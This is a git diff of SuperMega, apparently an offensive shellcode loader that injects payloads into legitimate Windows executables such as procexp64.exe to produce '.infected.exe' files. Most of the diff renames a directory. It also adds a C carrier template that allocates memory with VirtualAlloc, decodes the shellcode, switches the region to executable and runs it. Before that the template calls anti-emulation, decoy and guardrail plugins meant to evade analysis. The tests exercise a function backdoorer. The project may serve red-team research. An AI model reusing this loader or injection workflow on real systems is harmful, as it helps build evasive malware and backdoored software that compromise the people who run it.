diff --git a/.gitignore b/.gitignore index 020dbc2..cee547a 100644 --- a/.gitignore +++ b/.gitignore @@ -5,12 +5,6 @@ tools/ doc/ projects/* -!projects/default/ -!projects/default/** - -data/binary/exes_more/ -data/source/payload/ -data/binary/exes/* log-* *.verify.exe diff --git a/README.md b/README.md index 1a8c7b9..dc7398f 100644 --- a/README.md +++ b/README.md @@ -100,7 +100,7 @@ C:\Users\dobin\Repos\SuperMega>python.exe supermega.py (helper.py ) > Run process: ml64.exe projects/commandline/main.asm /link /OUT:projects/commandline/main.exe /entry:AlignRSP (assembler.py ) Carrier Size: 590 (injector.py ) -[ Injecting Carrier -(injector.py ) Injectable: data/binary/exes/procexp64.exe -> projects/commandline/procexp64.infected.exe +(injector.py ) Injectable: data/binary/injectables/procexp64.exe -> projects/commandline/procexp64.infected.exe (injector.py ) Checking if IAT entries required by carrier are available (injector.py ) IAT entries missing: 0 (injector.py ) Inject: Write Carrier to 0x71C8D (0x7108D) @@ -112,7 +112,7 @@ C:\Users\dobin\Repos\SuperMega>python.exe supermega.py To inject shellcode `messagebox.bin` into injectable `procexp64.exe` with carrier `alloc_rw_rx` and decoder `xor_1`, where: * shellcode `messagebox.bin`: `data/binary/shellcodes/messagebox.bin` -* injectable `procexp64.exe`: `data/binary/exes/procexp64.exe` +* injectable `procexp64.exe`: `data/binary/injectables/procexp64.exe` * carrier `alloc_rw_rx`: `data/source/carrier/alloc_rw_rx/template.c` * decoder `xor_1`: `data/source/decoder/xor_1.c` @@ -138,7 +138,7 @@ To inject shellcode `messagebox.bin` into injectable `procexp64.exe` with carrie (helper.py ) > Run process: ml64.exe projects/commandline/main.asm /link /OUT:projects/commandline/main.exe /entry:AlignRSP (assembler.py ) Carrier Size: 576 (injector.py ) -[ Injecting Carrier -(injector.py ) Injectable: data/binary/exes/procexp64.exe -> projects/commandline/procexp64.infected.exe +(injector.py ) Injectable: data/binary/injectables/procexp64.exe -> projects/commandline/procexp64.infected.exe (injector.py ) Checking if IAT entries required by carrier are available (injector.py ) IAT entries missing: 0 (injector.py ) Inject: Write Carrier to 0x71C43 (0x71043) @@ -175,7 +175,7 @@ community edition. Input: * `data/binary/shellcodes`: Input: Shellcodes we want to use as input (payload). .bin -* `data/binary/exes/`: Input: Nonmalicious EXE files we inject into. .exe +* `data/binary/injectables/`: Input: Nonmalicious EXE files we inject into. .exe Output: * `projects/`: output: Project directory with generated files, including infected exe diff --git a/app/templates/index.html b/app/templates/index.html index ba4249a..8001dbb 100644 --- a/app/templates/index.html +++ b/app/templates/index.html @@ -24,7 +24,7 @@ The original functionality of the EXE/DLL will not work anymore (it will only execute the carrier with the shellcode it is carrying)
- Located in the data/binary/exes/ directory.
+ Located in the data/binary/injectables/ directory.

Carrier

diff --git a/app/templates/exe.html b/app/templates/injectable.html similarity index 100% rename from app/templates/exe.html rename to app/templates/injectable.html diff --git a/app/templates/exes.html b/app/templates/injectables.html similarity index 64% rename from app/templates/exes.html rename to app/templates/injectables.html index e5c8dda..6befd6a 100644 --- a/app/templates/exes.html +++ b/app/templates/injectables.html @@ -8,18 +8,18 @@
- Injectables in data/binary/exes + Injectables in data/binary/injectables - {% for exe in exes %} -

{{exe['name']}}

- More details + {% for injectable in injectables %} +

{{injectable['name']}}

+ More details - {% for section in exe['sections'] %} + {% for section in injectable['sections'] %} diff --git a/app/templates/navigation.html b/app/templates/navigation.html index b369f30..9ad525b 100644 --- a/app/templates/navigation.html +++ b/app/templates/navigation.html @@ -23,8 +23,8 @@ href="/projects">Projects
  • - Injectables + Injectables
    • diff --git a/app/templates/project.html b/app/templates/project.html index 50d627c..786aaa2 100644 --- a/app/templates/project.html +++ b/app/templates/project.html @@ -78,18 +78,18 @@
    @@ -110,7 +110,7 @@
    - EXE Info: + EXE Info:
    • {% if is_64 %} diff --git a/app/views.py b/app/views.py index 2a3c839..9804765 100644 --- a/app/views.py +++ b/app/views.py @@ -17,15 +17,15 @@ def index(): return render_template('index.html') -@views.route("/exes/") -def exe_view(exe_name): - filepath = "{}{}".format(PATH_EXES, exe_name) +@views.route("/injectables/") +def injectable_view(exe_name): + filepath = "{}{}".format(PATH_INJECTABLES, exe_name) if not os.path.exists(filepath): return "File not found: {}".format(exe_name) superpe = SuperPe(filepath) - return render_template('exe.html', + return render_template('injectable.html', superpe=superpe, resolved_dlls=resolve_dlls(superpe), iat=superpe.get_iat_entries(), @@ -33,16 +33,16 @@ def exe_view(exe_name): ) -@views.route("/exes") -def exes_view(): - exes = [] - for file in os.listdir(PATH_EXES): +@views.route("/injectables") +def injectables_view(): + injectables = [] + for file in os.listdir(PATH_INJECTABLES): if not file.endswith(".dll") and not file.endswith(".exe"): continue if '.verify' in file or '.test' in file: continue - superpe = SuperPe("{}/{}".format(PATH_EXES, file)) + superpe = SuperPe("{}/{}".format(PATH_INJECTABLES, file)) e = { 'name': file, @@ -50,9 +50,9 @@ def exes_view(): #'iat': superpe.get_iat_entries(), 'sections': superpe.pe_sections, } - exes.append(e) + injectables.append(e) #break - return render_template('exes.html', exes=exes) + return render_template('injectables.html', injectables=injectables) @views.app_template_filter('hexint') diff --git a/app/views_project.py b/app/views_project.py index 9babd9e..5aa0660 100644 --- a/app/views_project.py +++ b/app/views_project.py @@ -47,8 +47,7 @@ def project(name): if project_setting == None: logger.error("Project {} not found".format(name)) return redirect("/projects", code=302) - - project_setting.print() + #project_setting.print() is_built = False if os.path.exists(project_setting.get_inject_exe_out()): @@ -97,7 +96,7 @@ def project(name): project_dir = os.path.dirname(os.getcwd() + "\\" + project_setting.project_path) log_files = get_logfiles(project_setting.project_path) - exes = list_files_and_sizes(PATH_EXES) + injectables = list_files_and_sizes(PATH_INJECTABLES) shellcodes = list_files_and_sizes(PATH_SHELLCODES) carrier_names = get_template_names() @@ -117,7 +116,7 @@ def project(name): project_dir=project_dir, settings=project_setting, - exes=exes, + injectables=injectables, shellcodes=shellcodes, carrier_names=carrier_names, decoder_styles=decoder_styles, diff --git a/data/binary/exes/7z.exe b/data/binary/injectables/7z.exe similarity index 100% rename from data/binary/exes/7z.exe rename to data/binary/injectables/7z.exe diff --git a/data/binary/injectables/TestDll.dll b/data/binary/injectables/TestDll.dll new file mode 100644 index 0000000..c451717 Binary files /dev/null and b/data/binary/injectables/TestDll.dll differ diff --git a/data/binary/exes/iattest-full.exe b/data/binary/injectables/iattest-full.exe similarity index 100% rename from data/binary/exes/iattest-full.exe rename to data/binary/injectables/iattest-full.exe diff --git a/data/binary/injectables/libbz2.dll b/data/binary/injectables/libbz2.dll new file mode 100644 index 0000000..cd5e11a Binary files /dev/null and b/data/binary/injectables/libbz2.dll differ diff --git a/data/binary/exes/procexp64.exe b/data/binary/injectables/procexp64.exe similarity index 100% rename from data/binary/exes/procexp64.exe rename to data/binary/injectables/procexp64.exe diff --git a/data/binary/exes/wifiinfoview.exe b/data/binary/injectables/wifiinfoview.exe similarity index 100% rename from data/binary/exes/wifiinfoview.exe rename to data/binary/injectables/wifiinfoview.exe diff --git a/model/defs.py b/model/defs.py index fdd33d8..7e9ac80 100644 --- a/model/defs.py +++ b/model/defs.py @@ -7,10 +7,11 @@ class FilePath(str): # with data/shellcodes/createfile.bin VerifyFilename: FilePath = FilePath("C:\\Temp\\a") -# Directory structure -PATH_EXES = "data/binary/exes/" - +# Input Binary +PATH_INJECTABLES = "data/binary/injectables/" PATH_SHELLCODES = "data/binary/shellcodes/" + +# Input Source PATH_CARRIER = "data/source/carrier/" PATH_DECODER = "data/source/decoder/" PATH_ANTIEMULATION = "data/source/antiemulation/" @@ -18,7 +19,7 @@ PATH_DECOY = "data/source/decoy/" PATH_GUARDRAILS = "data/source/guardrails/" PATH_VIRTUALPROTECT = "data/source/virtualprotect/" -PATH_PAYLOAD = "data/source/payload/" +# Project settings PATH_WEB_PROJECT = "projects/" diff --git a/model/settings.py b/model/settings.py index 7cdb8a5..ffa2957 100644 --- a/model/settings.py +++ b/model/settings.py @@ -16,7 +16,7 @@ class Settings(): self.project_exe_path: FilePath = FilePath(self.project_path + "main.exe") self.project_shc_path: FilePath = FilePath(self.project_path + "main.bin") - # IN: Injectable (like "7z.exe", in data/input/exes/) + # IN: Injectable (like "7z.exe", in data/input/injectables/) self.injectable_base: str = "" # IN: Payload / Shellcode (like "createfile.bin", in data/input/shellcodes/) self.payload_base: str = "" @@ -62,7 +62,7 @@ class Settings(): def get_inject_exe_in(self) -> FilePath: if self.injectable_base == "": return None - return FilePath(PATH_EXES + self.injectable_base) + return FilePath(PATH_INJECTABLES + self.injectable_base) def get_inject_exe_out(self) -> FilePath: return FilePath("{}{}".format( diff --git a/projects/default/template.c b/projects/default/template.c new file mode 100644 index 0000000..5f328eb --- /dev/null +++ b/projects/default/template.c @@ -0,0 +1,62 @@ +#include + +#include + +char *supermega_payload; + +#define p_RW 0x04 +#define p_RX 0x20 +#define p_RWX 0x40 + + +{{plugin_antiemulation}} + +{{plugin_decoy}} + +{{plugin_executionguardrail}} + +{{plugin_virtualprotect}} + +/* VirtualAlloc -> rw -> rx + + * create new memory region for the payload + * will set it to RX (may break some shellcodes, opsec-safe) +*/ + +int main() +{ + DWORD result; + + // Call: Execution Guardrail + if (executionguardrail() != 0) { + return 1; + } + + // Call: Anti Emulation plugin + antiemulation(); + + // Call: Decoy plugin + decoy(); + + // Allocate 1 + // char *dest = ... + char *dest = VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, p_RW); + + // Wait a bit + //Sleep(2000); + + // Copy (and decode) + // from: supermega_payload[] + // to: dest[] +{{ plugin_decoder }} + + if (MyVirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) { + return 7; + } + + // Execute *dest + (*(void(*)())(dest))(); + + return 0; +} + diff --git a/supermega.py b/supermega.py index e135ab7..75e79c8 100644 --- a/supermega.py +++ b/supermega.py @@ -30,7 +30,7 @@ def main(): parser = argparse.ArgumentParser(description='SuperMega shellcode loader') parser.add_argument('--shellcode', type=str, help='payload shellcode: data/binary/shellcodes/* (messagebox.bin, calc64.bin, ...)', default="calc64.bin") - parser.add_argument('--inject', type=str, help='which exe to inject into: data/binary/exes/* (7z.exe, procexp64.exe, ...)', default="procexp64.exe") + parser.add_argument('--inject', type=str, help='which exe to inject into: data/binary/injectables/* (7z.exe, procexp64.exe, ...)', default="procexp64.exe") parser.add_argument('--carrier', type=str, help='carrier: data/source/carrier/* (alloc_rw_rx, peb_walk, ...)', default="alloc_rw_rx") parser.add_argument('--decoder', type=str, help='decoder: data/source/decoders/* (xor_1, xor_2, plain, ...)', default="xor_2") parser.add_argument('--antiemulation', type=str, help='anti-emulation: data/source/antiemulation/* (sirallocalot, timeraw, none, ...)', default="sirallocalot") diff --git a/tests/test_datareuse.py b/tests/test_datareuse.py index 0e1ef93..8af1a12 100644 --- a/tests/test_datareuse.py +++ b/tests/test_datareuse.py @@ -36,7 +36,7 @@ class DataReuseTest(unittest.TestCase): self.assertIsNotNone(hole) def test_relocation_list(self): - superpe = SuperPe(PATH_EXES + "7z.exe") + superpe = SuperPe(PATH_INJECTABLES + "7z.exe") relocs = superpe.get_relocations_for_section(".rdata") self.assertEqual(836, len(relocs)) reloc = relocs[0] @@ -48,7 +48,7 @@ class DataReuseTest(unittest.TestCase): def test_relocmanager(self): """Test reference EXE reloc manager information""" - superpe = SuperPe(PATH_EXES + "procexp64.exe") + superpe = SuperPe(PATH_INJECTABLES + "procexp64.exe") rm = superpe.get_rdata_rangemanager() self.assertEqual(61, len(rm.intervals)) # 0x1ab0 is magic currently (should use find_first_utf16_string_offset() @@ -57,7 +57,7 @@ class DataReuseTest(unittest.TestCase): def test_largestgap(self): - superpe = SuperPe(PATH_EXES + "7z.exe") + superpe = SuperPe(PATH_INJECTABLES + "7z.exe") rm = superpe.get_rdata_rangemanager() start, stop = rm.find_hole(100) self.assertEqual(394513, start) diff --git a/tests/test_derbackdoorer.py b/tests/test_derbackdoorer.py index 80ced9d..47c79fe 100644 --- a/tests/test_derbackdoorer.py +++ b/tests/test_derbackdoorer.py @@ -16,7 +16,7 @@ class DerBackdoorerTest(unittest.TestCase): def test_function_backdoorer_exe(self): - superpe = SuperPe(PATH_EXES + "iattest-full.exe") + superpe = SuperPe(PATH_INJECTABLES + "iattest-full.exe") function_backdoorer = FunctionBackdoorer(superpe, depth_option=DEPTH_OPTIONS.LEVEL1) addr = function_backdoorer.find_suitable_instruction_addr(superpe.get_entrypoint()) @@ -24,7 +24,7 @@ class DerBackdoorerTest(unittest.TestCase): def test_function_backdoorer_dll(self): - superpe = SuperPe(PATH_EXES + "TestDLL.dll") + superpe = SuperPe(PATH_INJECTABLES + "TestDLL.dll") function_backdoorer = FunctionBackdoorer(superpe) addr = function_backdoorer.find_suitable_instruction_addr(superpe.get_entrypoint()) diff --git a/tests/test_dllresolver.py b/tests/test_dllresolver.py index 2bc5efb..2567757 100644 --- a/tests/test_dllresolver.py +++ b/tests/test_dllresolver.py @@ -10,7 +10,7 @@ from pe.dllresolver import * class DllResolverTest(unittest.TestCase): def test_dllresolver(self): - filename = "data/binary/exes/7z.exe" + filename = "data/binary/injectables/7z.exe" superpe = SuperPe(filename) self.assertTrue(all_dll_exist(superpe)) diff --git a/tests/test_superpe.py b/tests/test_superpe.py index 2011ef5..4fe0fd8 100644 --- a/tests/test_superpe.py +++ b/tests/test_superpe.py @@ -9,7 +9,7 @@ from pe.superpe import SuperPe, PeSection class SuperPeTest(unittest.TestCase): def test_exe(self): - dll_filepath = PATH_EXES + "procexp64.exe" + dll_filepath = PATH_INJECTABLES + "procexp64.exe" superpe = SuperPe(dll_filepath) # Properties @@ -70,7 +70,7 @@ class SuperPeTest(unittest.TestCase): def test_dll(self): - dll_filepath = PATH_EXES + "TestDLL.dll" + dll_filepath = PATH_INJECTABLES + "TestDLL.dll" superpe = SuperPe(dll_filepath) # Properties
    name raw size
    {{section['name']}} {{section['raw_size']}}